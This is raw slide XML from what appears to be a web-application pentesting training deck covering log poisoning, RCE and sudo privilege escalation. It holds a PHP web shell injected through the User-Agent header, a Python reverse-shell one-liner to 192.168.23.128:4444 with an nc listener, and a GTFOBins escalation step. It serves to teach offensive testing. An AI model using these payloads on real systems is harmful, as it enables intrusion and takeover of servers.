              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B019542-AC26-83DA-5B9D-7F69B70DA29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006687" y="3925094"/>
            <a:ext cx="4111414" cy="2083221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABCC7114-9835-6DD1-F71F-CEEFFEE15429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5431971" y="4343400"/>
            <a:ext cx="6760029" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Send this to the repeater to test injection attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808681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2DE3-94E7-9AF2-E2DE-C4FEF7225441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707572" y="0"/>
            <a:ext cx="9329057" cy="799646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log poisoning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F18EFEB-C764-1BF2-C495-E4C84A54424C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1041852"/>
            <a:ext cx="12077700" cy="5816147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send to repeater.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']);?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject this on the User Agent part to run commands on the access file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;command&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We get the response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5088B67-95DB-1D5B-4DD6-509B1CAE41B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960005" y="493719"/>
            <a:ext cx="4803949" cy="1766354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C79BC6A-8C65-45A3-B7D2-CBC603415116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9387148" y="967093"/>
            <a:ext cx="1097280" cy="18288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10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536D8A86-1F2C-03F4-FFC7-70D88E8D9FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153150" y="3216274"/>
            <a:ext cx="5505450" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13F11EE1-22A5-1242-8155-5B54165E9EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960005" y="5091258"/>
            <a:ext cx="2574395" cy="1716263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD85D18-4AF6-BDA1-634F-26A3ABBC281B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080053" y="1270000"/>
            <a:ext cx="2469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9EE6495-C3E1-CC6F-59BF-1E85EBA4F2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="2717800"/>
            <a:ext cx="933450" cy="85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AD35C2-865A-0257-CBCC-018A9F41E45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4991100" y="3568700"/>
            <a:ext cx="116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1F89F6-8B60-4D46-BB21-FD8D629B20F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="5473700"/>
            <a:ext cx="2095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824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4B51-634A-BE2B-BD95-C692475CBC21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643191" y="609600"/>
            <a:ext cx="6573685" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>RCE, Log Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10A99CF-581B-2A8D-5963-46D221E124CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="6573684" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>LD_LIBRARY_PATH=/lib/x86_64-linux-gnu:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>/lib/x86_64-linux-gnu /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>/bin/python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>socket,subprocess,os;s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>socket.AF_INET,socket.SOCK_STREAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>(("192.168.23.128",4444));os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>(),0);os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>(),1);os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>(),2);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>subprocess.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>(["/bin/bash","-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>"]);’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Use this vulnerable code to get a reverse shell connection to the attacker machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>On the attacker machine run, sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8312FA-A6C2-FEFC-B90D-19C12AF920F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="9684" r="52871" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570839" y="1742291"/>
            <a:ext cx="3976788" cy="305337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29019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9C14-0A1B-B8DE-5CE3-D504A3132FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237067" y="-115496"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>SUDO privilege escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA0FEB03-7C05-13CA-085F-00530DBB57BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5942414" y="1778507"/>
            <a:ext cx="3572374" cy="657317"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E88D869-E22B-E673-8099-0A625BE88924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444500" y="1945188"/>
            <a:ext cx="11531599" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows that we get access as a normal user.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From this run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command to see where this user can run any sudo service without password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> this website and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for VIM and look for sudo. Then well get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>malitious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command to do privilege escalation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E84E9BE-EEFF-A373-B2CD-E6007EF41843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499533" y="2884590"/>
            <a:ext cx="3515216" cy="666843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A7AD1C7-9950-62BB-F14E-617E664AD4D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7212541" y="3108610"/>
            <a:ext cx="2998259" cy="1499130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E87FF3-F1EF-38A0-9711-B741D3F62241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7449201" y="4789525"/>
            <a:ext cx="3896478" cy="1909870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E60343A-7CC5-94A4-8A1E-E502781A68F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237067" y="5089825"/>
            <a:ext cx="6836833" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally run this command to see the full interactive shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/bash –I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1E46C2-BA6F-5FEF-C5AC-C1236DA3B719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2563004" y="5828489"/>
            <a:ext cx="4508499" cy="825985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40740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426636-B045-C9FC-55C5-D6305A628C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6708499" y="643467"/>
            <a:ext cx="4521480" cy="5571064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>End of web-app pentesting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
